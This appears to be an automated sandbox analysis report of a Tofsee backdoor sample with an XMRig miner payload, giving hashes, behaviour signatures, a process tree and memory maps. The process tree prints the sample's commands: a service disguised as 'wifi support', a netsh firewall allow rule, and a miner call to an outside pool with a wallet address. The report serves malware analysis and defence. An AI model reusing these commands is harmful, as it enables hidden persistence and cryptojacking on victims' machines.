Analysis

  • max time kernel
    151s
  • max time network
    152s
  • platform
    windows10_x64
  • resource
    win10v20210408
  • submitted
    26-09-2021 22:40

General

  • Target

    b23f703c7ca079fa43cc7fb65f58ec401533fada301eeeec2403ef68f339bf23.exe

  • Size

    154KB

  • MD5

    886b4b87250c31f9e17d0be3dde1a920

  • SHA1

    94067fea1c477011731f491d912d3f1cb4f893b2

  • SHA256

    b23f703c7ca079fa43cc7fb65f58ec401533fada301eeeec2403ef68f339bf23

  • SHA512

    bee9cdbb85f872427b4d03a8fcd88eab072c23e50c305d9ddd41cfa66e6e5499c00a8c2ef5361db889a9833cc667ddfa7e820e399b645ec058e1890d9dd93db3

Malware Config

Signatures

  • Tofsee

    Backdoor/botnet which carries out malicious activities based on commands from a C2 server.

  • Windows security bypass 2 TTPs
  • suricata: ET MALWARE DNS Query Sinkhole Domain Various Families (Possible Infected Host)

    suricata: ET MALWARE DNS Query Sinkhole Domain Various Families (Possible Infected Host)

  • xmrig

    XMRig is a high performance, open source, cross platform CPU/GPU miner.

  • XMRig Miner Payload 3 IoCs
  • Creates new service(s) 1 TTPs
  • Executes dropped EXE 1 IoCs
  • Modifies Windows Firewall 1 TTPs
  • Sets service image path in registry 2 TTPs
  • Deletes itself 1 IoCs
  • Drops file in System32 directory 2 IoCs
  • Suspicious use of SetThreadContext 2 IoCs
  • Launches sc.exe

    Sc.exe is a Windows utlilty to control services on the system.

  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

  • Modifies data under HKEY_USERS 13 IoCs
  • Suspicious use of AdjustPrivilegeToken 1 IoCs
  • Suspicious use of WriteProcessMemory 28 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\b23f703c7ca079fa43cc7fb65f58ec401533fada301eeeec2403ef68f339bf23.exe
    "C:\Users\Admin\AppData\Local\Temp\b23f703c7ca079fa43cc7fb65f58ec401533fada301eeeec2403ef68f339bf23.exe"
    1⤵
    • Suspicious use of WriteProcessMemory
    PID:3128
    • C:\Windows\SysWOW64\cmd.exe
      "C:\Windows\System32\cmd.exe" /C mkdir C:\Windows\SysWOW64\gswrdohu\
      2⤵
        PID:3276
      • C:\Windows\SysWOW64\cmd.exe
        "C:\Windows\System32\cmd.exe" /C move /Y "C:\Users\Admin\AppData\Local\Temp\iljeyfpz.exe" C:\Windows\SysWOW64\gswrdohu\
        2⤵
          PID:3932
        • C:\Windows\SysWOW64\sc.exe
          "C:\Windows\System32\sc.exe" create gswrdohu binPath= "C:\Windows\SysWOW64\gswrdohu\iljeyfpz.exe /d\"C:\Users\Admin\AppData\Local\Temp\b23f703c7ca079fa43cc7fb65f58ec401533fada301eeeec2403ef68f339bf23.exe\"" type= own start= auto DisplayName= "wifi support"
          2⤵
            PID:3908
          • C:\Windows\SysWOW64\sc.exe
            "C:\Windows\System32\sc.exe" description gswrdohu "wifi internet conection"
            2⤵
              PID:3564
            • C:\Windows\SysWOW64\sc.exe
              "C:\Windows\System32\sc.exe" start gswrdohu
              2⤵
                PID:2996
              • C:\Windows\SysWOW64\netsh.exe
                "C:\Windows\System32\netsh.exe" advfirewall firewall add rule name="Host-process for services of Windows" dir=in action=allow program="C:\Windows\SysWOW64\svchost.exe" enable=yes>nul
                2⤵
                  PID:348
              • C:\Windows\SysWOW64\gswrdohu\iljeyfpz.exe
                C:\Windows\SysWOW64\gswrdohu\iljeyfpz.exe /d"C:\Users\Admin\AppData\Local\Temp\b23f703c7ca079fa43cc7fb65f58ec401533fada301eeeec2403ef68f339bf23.exe"
                1⤵
                • Executes dropped EXE
                • Suspicious use of SetThreadContext
                • Suspicious use of WriteProcessMemory
                PID:852
                • C:\Windows\SysWOW64\svchost.exe
                  svchost.exe
                  2⤵
                  • Deletes itself
                  • Drops file in System32 directory
                  • Suspicious use of SetThreadContext
                  • Modifies data under HKEY_USERS
                  • Suspicious use of WriteProcessMemory
                  PID:1240
                  • C:\Windows\SysWOW64\svchost.exe
                    svchost.exe -o fastpool.xyz:10060 -u 9rLbTvsApFs3i3ojk5hDKicMNRQbxxFGwJA2hNC6NoZZDQN5tTFbhviFm4W3koxSrPg87Lnif7qxFYh9xpTJz1cT6B17Ph4.50000 -p x -k -a cn/half
                    3⤵
                    • Suspicious use of AdjustPrivilegeToken
                    PID:2076

              Network

              MITRE ATT&CK Enterprise v6

              Replay Monitor

              Loading Replay Monitor...

              Downloads

              • C:\Users\Admin\AppData\Local\Temp\iljeyfpz.exe
                MD5

                37b827451143afba83759b1f0ae29fc8

                SHA1

                9f8402fdc4e6d892613174810dc0257aabeb835d

                SHA256

                973c587e23d70b26e44d765467402275557fe76db5510b6cfec9da55bf98e844

                SHA512

                0c270eb302ac5b78a4761b4221a1789ecad8ce59c09e81fe92bc25d9fd97e84e92ee36dd0611570b1765a5510aa05109747c2e73bd4171dc7312fd80844e7684

              • C:\Windows\SysWOW64\gswrdohu\iljeyfpz.exe
                MD5

                37b827451143afba83759b1f0ae29fc8

                SHA1

                9f8402fdc4e6d892613174810dc0257aabeb835d

                SHA256

                973c587e23d70b26e44d765467402275557fe76db5510b6cfec9da55bf98e844

                SHA512

                0c270eb302ac5b78a4761b4221a1789ecad8ce59c09e81fe92bc25d9fd97e84e92ee36dd0611570b1765a5510aa05109747c2e73bd4171dc7312fd80844e7684

              • memory/348-123-0x0000000000000000-mapping.dmp
              • memory/852-129-0x0000000000400000-0x00000000004AD000-memory.dmp
                Filesize

                692KB

              • memory/852-128-0x00000000004B0000-0x00000000005FA000-memory.dmp
                Filesize

                1.3MB

              • memory/1240-124-0x0000000002D40000-0x0000000002D55000-memory.dmp
                Filesize

                84KB

              • memory/1240-125-0x0000000002D49A6B-mapping.dmp
              • memory/1240-130-0x0000000002D40000-0x0000000002D55000-memory.dmp
                Filesize

                84KB

              • memory/2076-131-0x0000000002C40000-0x0000000002D31000-memory.dmp
                Filesize

                964KB

              • memory/2076-135-0x0000000002CD259C-mapping.dmp
              • memory/2076-136-0x0000000002C40000-0x0000000002D31000-memory.dmp
                Filesize

                964KB

              • memory/2996-121-0x0000000000000000-mapping.dmp
              • memory/3128-114-0x0000000000580000-0x00000000006CA000-memory.dmp
                Filesize

                1.3MB

              • memory/3128-115-0x0000000000400000-0x00000000004AD000-memory.dmp
                Filesize

                692KB

              • memory/3276-116-0x0000000000000000-mapping.dmp
              • memory/3564-120-0x0000000000000000-mapping.dmp
              • memory/3908-119-0x0000000000000000-mapping.dmp
              • memory/3932-117-0x0000000000000000-mapping.dmp